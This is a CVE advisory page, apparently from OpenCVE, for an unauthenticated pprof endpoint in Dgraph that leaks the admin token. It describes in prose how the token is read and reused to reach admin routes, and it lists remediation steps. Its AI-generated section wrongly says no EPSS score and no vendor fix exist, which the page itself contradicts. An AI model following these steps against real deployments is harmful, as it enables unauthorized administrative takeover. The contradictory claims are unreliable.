Description
Dgraph is an open source distributed GraphQL database. Versions 25.3.1 and prior contain an unauthenticated credential disclosure vulnerability where the /debug/pprof/cmdline endpoint is registered on the default mux and reachable without authentication, exposing the full process command line including the admin token configured via the --security "token=..." startup flag. An attacker can retrieve the leaked token and reuse it in the X-Dgraph-AuthToken header to gain unauthorized access to admin-only endpoints such as /admin/config/cache_mb, bypassing the adminAuthHandler token validation. This enables unauthorized privileged administrative access including configuration changes and operational control actions in any deployment where the Alpha HTTP port is reachable by untrusted parties. This issue has been fixed in version 25.3.2.
Published: 2026-04-15
Score: 9.4 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Unauthorized privileged administrative access
Action: Immediate Patch
AI Analysis

Impact

Dgraph exposes the full process command line through the /debug/pprof/cmdline endpoint without requiring authentication. The command line contains the admin token defined by the --security "token=..." flag, which attackers can capture and embed in the X-Dgraph-AuthToken header to bypass the adminAuthHandler. This allows read/write access to admin‑only routes, including configuration changes and operational controls, effectively granting full administrative privileges for any deployment with an exposed Alpha HTTP port.

Affected Systems

Vulnerable products are the dgraph-io dgraph 25.3.1 and earlier releases. The issue exists when the Alpha HTTP port is reachable by untrusted network participants. Any deployment of these versions in an unprotected environment is susceptible.

Risk and Exploitability

The vulnerability has a CVSS base score of 9.4, indicating critical severity. No EPSS score is available, and it is not listed in the CISA KEV catalog, but the absence of authentication and the ubiquity of the exposed endpoint make exploitation straightforward for anyone with network access to the target service. The attack vector is a simple unauthenticated HTTP request to the pprof endpoint, enabling credential disclosure and subsequent privilege escalation.

Generated by OpenCVE AI on April 16, 2026 at 02:19 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Dgraph to version 25.3.2 or later, which removes the vulnerable pprof endpoint.
  • If upgrading is not immediately possible, restrict access to the /debug/pprof/cmdline path by firewalling the Alpha port or by configuring the server to expose the endpoint only on localhost.
  • Rotate or revoke any previously leaked admin tokens and ensure that the --security token flag is updated to a new value or removed.

Generated by OpenCVE AI on April 16, 2026 at 02:19 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-95mq-xwj4-r47p Dgraph: Unauthenticated /debug/pprof/cmdline discloses admin auth token, enabling unauthorized access to protected Alpha admin endpoints
History

Thu, 16 Apr 2026 12:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Thu, 16 Apr 2026 09:15:00 +0000

Type Values Removed Values Added
First Time appeared Dgraph
Dgraph dgraph
Vendors & Products Dgraph
Dgraph dgraph

Wed, 15 Apr 2026 21:00:00 +0000

Type Values Removed Values Added
Description Dgraph is an open source distributed GraphQL database. Versions 25.3.1 and prior contain an unauthenticated credential disclosure vulnerability where the /debug/pprof/cmdline endpoint is registered on the default mux and reachable without authentication, exposing the full process command line including the admin token configured via the --security "token=..." startup flag. An attacker can retrieve the leaked token and reuse it in the X-Dgraph-AuthToken header to gain unauthorized access to admin-only endpoints such as /admin/config/cache_mb, bypassing the adminAuthHandler token validation. This enables unauthorized privileged administrative access including configuration changes and operational control actions in any deployment where the Alpha HTTP port is reachable by untrusted parties. This issue has been fixed in version 25.3.2.
Title Dgraph: Unauthenticated pprof endpoint leaks admin auth token
Weaknesses CWE-200
CWE-215
References
Metrics cvssV3_1

{'score': 9.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L'}

Subscriptions

Dgraph Dgraph
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-16T12:05:10.186Z

Reserved: 2026-04-09T20:59:17.618Z

Link: CVE-2026-40173

cve-icon Vulnrichment

Updated: 2026-04-16T11:26:13.684Z

cve-icon NVD

Status : Received

Published: 2026-04-15T21:17:27.197

Modified: 2026-04-16T13:16:49.943

Link: CVE-2026-40173

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-16T09:00:05Z

Weaknesses